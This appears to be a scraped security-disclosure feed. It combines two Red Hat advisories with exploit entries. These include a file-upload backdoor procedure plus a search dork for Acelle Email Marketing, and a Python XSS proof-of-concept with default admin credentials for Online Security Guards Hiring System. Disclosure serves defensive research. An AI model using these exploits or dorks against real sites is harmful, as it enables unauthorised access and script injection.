Red Hat Security Advisory 2023-3394-01 - The Public Key Infrastructure Core contains fundamental packages required by Red Hat Certificate System.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: pki-core:10.6 security update  
Advisory ID:       RHSA-2023:3394-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3394  
Issue date:        2023-05-31  
CVE Names:         CVE-2022-2393 CVE-2022-2414   
=====================================================================

1. Summary:

An update for the pki-core:10.6 module is now available for Red Hat  
Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The Public Key Infrastructure (PKI) Core contains fundamental packages  
required by Red Hat Certificate System.

Security Fix(es):

* pki-core: access to external entities when parsing XML can lead to XXE  
(CVE-2022-2414)

* pki-core: When using the caServerKeygen_DirUserCert profile, user can get  
certificates for other UIDs by entering name in Subject field  
(CVE-2022-2393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2101046 - CVE-2022-2393 pki-core: When using the caServerKeygen_DirUserCert profile, user can get certificates for other UIDs by entering name in Subject field  
2104676 - CVE-2022-2414 pki-core: access to external entities when parsing XML can lead to XXE

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.src.rpm  
ldapjdk-4.23.0-1.module+el8.5.0+11983+6ba118b4.src.rpm  
pki-core-10.12.7-1.module+el8.6.0+18623+dea80f17.src.rpm  
tomcatjss-7.7.1-1.module+el8.6.0+13291+248751b1.src.rpm

aarch64:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm

noarch:  
ldapjdk-4.23.0-1.module+el8.5.0+11983+6ba118b4.noarch.rpm  
ldapjdk-javadoc-4.23.0-1.module+el8.5.0+11983+6ba118b4.noarch.rpm  
pki-acme-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-base-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-base-java-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-ca-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-kra-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-server-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
python3-pki-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
tomcatjss-7.7.1-1.module+el8.6.0+13291+248751b1.noarch.rpm

ppc64le:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm

s390x:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm

x86_64:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2393  
https://access.redhat.com/security/cve/CVE-2022-2414  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHeVAtzjgjWX9erEAQiB2A//QrQfE2CNEk7MqCukaj0nDVJwAS+V/BXU  
Z6Q1nmjxSz4BI7H8A9TKhFP1hHaovouYOxgnUnos3qEVZBnr49yjokB3wABT+UG0  
MZ7Czc9k8LT0RlBa4yIJYvnqXPoAnsXa6LBpjOmSRvNlMucK54GdNjgV9XrdOXnA  
IFHWn+Rg5/tJxBaMOcxBsnbWCAebvAT+mQakh4bDgWsCRWtJqTSogKmnKAPaTNx/  
8UQWaxfrk/7usDvoDvZUaMqbzsA5Nr+pPuGqD6h6OkC0RuBMAG3D99YPrryglmWG  
D6afkZAIPX+lNoIL2pJA2Tm2pUsHq34dgk6CCm+H7BYeHlbc4QiW+vmdxu750YuX  
I/vDilrjsDI4fxvSFt52zBdLWvPZX8Se/Pb6pJF7nziU2uSYYlatiNRLEYiP0HZc  
oebOd0GL1QBM/Ny9c+6DemHDlgc4giUmpTZGt0kVMeSkEJMnLRPf6OwXq7qDYm8J  
5iB3qUISIkS2D0fAxFqOaaLE3cgdDA/PtZFu7P5weX8maEbtd/VvuiWWts/hw9YZ  
Zim7MhHLMccepUyZkGF2kCQ01q6D7tPhHYa4t2SDObZsIag5oXoZ7cgBGD6I/AfB  
uB27gnx7Jep1J0NReNjkmSb3uWJgIXk9QmIy56o/BzTeIIcPHzWsiV3bG8a29pxu  
PeBQd7wCAIs=  
=LxBB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3394-01

Acelle Email Marketing version 1.0 suffers from an arbitrary file upload vulnerability.

    ====================================================================================================================================| # Title     : Acelle Email Marketing v3.0.15 unrestricted file uploads Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/acelle-email-marketing-web-application/17796082                                        |  | # Dork      : ". Acelle Email Marketing Application by acellemail.com"                                                           |====================================================================================================================================poc :[+]  Unrestricted file uploads You can upload malicious files in compressed format[+]  Dorking İn Google Or Other Search Enggine .[+]  chose web site and singup .[+]  go to templates : https://127.0.0.1/demoacellemailcom/admin/templates or https://127.0.0.1/demoacellemailcom/templates[+]  Zip your backdoor And upload it.        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |                                                                                                                                      |=======================================================================================================================================

Acelle Email Marketing 3.0.15 Arbitrary File Upload

Online Security Guards Hiring System version 1.0 suffers from a cross site scripting vulnerability.

    #Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS #Google Dork : NA#Date: 23-01-2023#Exploit Author : AFFAN AHMED#Vendor Homepage: https://phpgurukul.com#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip#Version: 1.0#Tested on: Windows 11 + XAMPP + PYTHON-3.X#CVE : CVE-2023-0527#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT# Below code check for both the parameter /admin-profile.php and in /search.php#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.mdimport requests import re from colorama import Foreprint(Fore.YELLOW + "######################################################################" + Fore.RESET)print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)print(Fore.YELLOW +"######################################################################" + Fore.RESET)print()print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)print()# NAVIGATING TO ADMIN LOGIN PAGEWebsite_url = "http://localhost/osghs/admin/login.php"    # CHANGE THE URL ACCORDING TO YOUR SETUPprint(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',    'Referer': 'http://localhost/osghs/admin/login.php',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9',    'Connection': 'close',    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-User': '?1',    'Sec-Fetch-Dest': 'document'}response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)if response.status_code == 200:    location = re.findall(r'document.location =\'(.*?)\'',response.text)    if location:        print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)        print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )    else:        print(Fore.GREEN + "> document.location not found"+ Fore.RESET)else:    print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter  [**]" + Fore.RESET)# NAVIGATING TO ADMIN PROFILE SECTION  TO UPDATE ADMIN PROFILE # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETERWebsite_url= "http://localhost/osghs/admin/admin-profile.php"   # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""payload = {    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",      # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE    "username": "admin",                                                      # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE    "mobilenumber": "8979555558",    "email": "admin@gmail.com",    "submit": "",}# SENDING THE RESPONSE WITH POST REQUESTresponse = requests.post(Website_url, headers=headers, data=payload)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX if response.status_code == 200:    scripts = re.findall(r'<script>alert$.*?$</script>', response.text)    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)     print(Fore.GREEN+">"+Fore.RESET,scripts)exploit.pyDisplaying exploit.py.

Online Security Guards Hiring System 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-3388-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:3388-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3388  
Issue date:        2023-05-31  
CVE Names:         CVE-2022-3564 CVE-2022-4378 CVE-2022-39188   
                   CVE-2022-42703   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings  
leads to stale TLB entry (CVE-2022-39188)

* kernel: use-after-free related to leaf anon_vma double reuse  
(CVE-2022-42703)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* An application stopped on robust futex used via pthread_mutex_lock()  
(BZ#2170055)

* dm crypt: backport flags to optionally bypass kcryptd workqueues  
(BZ#2175202)

* The qede driver changes rx-usecs: to 256 causing performance impact  
(BZ#2176106)

* Intel QAT Update - (kernel changes) (BZ#2176852)

* Concurrent NVMe scans cause panic with native multipath (BZ#2178244)

* CNB: Update TC subsystem to upstream v5.18 (BZ#2179432)

* Server crashed in  cifs_reconnect -> dfs_cache_free_tgts (BZ#2182082)

* WARNING: possible circular locking dependency detected  
cpu_partial_store+0x44/0x80 (BZ#2184771)

* "smpboot: Scheduler frequency invariance went wobbly, disabling!" on  
nohz_full CPUs after long run (BZ#2188069)

* kernel-rt: task deadline_test:2526 blocked for more than 600 seconds.  
(BZ#2188625)

* gfs2: file corruption in large data files (BZ#2188687)

Enhancement(s):

* Add support for no HWP mode into intel_pstate for Sapphire Rapids (SPR)  
(BZ#2178644)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130141 - CVE-2022-39188 kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings leads to stale TLB entry  
2133483 - CVE-2022-42703 kernel: use-after-free related to leaf anon_vma double reuse  
2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kernel-4.18.0-372.57.1.el8_6.src.rpm

aarch64:  
bpftool-4.18.0-372.57.1.el8_6.aarch64.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-core-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-372.57.1.el8_6.noarch.rpm  
kernel-doc-4.18.0-372.57.1.el8_6.noarch.rpm

ppc64le:  
bpftool-4.18.0-372.57.1.el8_6.ppc64le.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-core-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm

s390x:  
bpftool-4.18.0-372.57.1.el8_6.s390x.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
perf-4.18.0-372.57.1.el8_6.s390x.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
python3-perf-4.18.0-372.57.1.el8_6.s390x.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm

x86_64:  
bpftool-4.18.0-372.57.1.el8_6.x86_64.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-core-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHeU+9zjgjWX9erEAQi2oQ/8CjXD50RTu/f05Wy6hXQ1WKi0RpVyivwS  
/ggH5Eda75T/a8L1zpjzr1lf00M/W3Xer1fOdUQ1j7s47ftaHz497iAZ0QquYL3T  
e8yuqTI8sHviWNVJdhqAweHHO7Q+P7a70E+Ey6LzPuKg1ytrb3qqFgZZogotMIeq  
pYHcd6LAiRnMejg8LbRRkCFBPOi+S9bGSyzVnnKQoaEt/4zpN12iLZOTOTlfWEYO  
bqzXs8vMZ41UEfqmv7IYpoE/pnRnLb77ZDNVyOUqYtEn0ny8dVn101+SNsitHnLs  
z5q6UNlcl+F3zOBvGLCraO03TqXLjKiwg6stYcny8/S6Z83FDLi7YTD87MC0XVH8  
NoaTF1c1Xsx9+lxo2+G6RU6+t2GC6AkBTO292WmGRNihTZioSZrGe/HiIXkEkyyL  
MrEevB1udkbFudeFl5UJIKT1PnVq4BHtIb5BqGMCNKIhqP5MiPiZ94D0l7qy2EzA  
OCqMrIdrucnBW88gBdtxaShniimeAxzjSVHqPZN5K1Z/o0DEg6n0zmwFCpQKgSRl  
/kSC14Bx/78OTL6+oGNd1/0z0ZcqhF1reqtvg9fJAT9uZaXcUjDtIbTsuoRbA2Db  
d3HUCdWkAFypfX0M1M77mSvhuXO1KW02ITFq18P5eLSH7qkn1boRe6lj8D2nOfO+  
Xg8eHVf7+44=  
=SiSH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3388-01

Rukovoditel version 3.3.1 suffers from a CSV injection vulnerability.

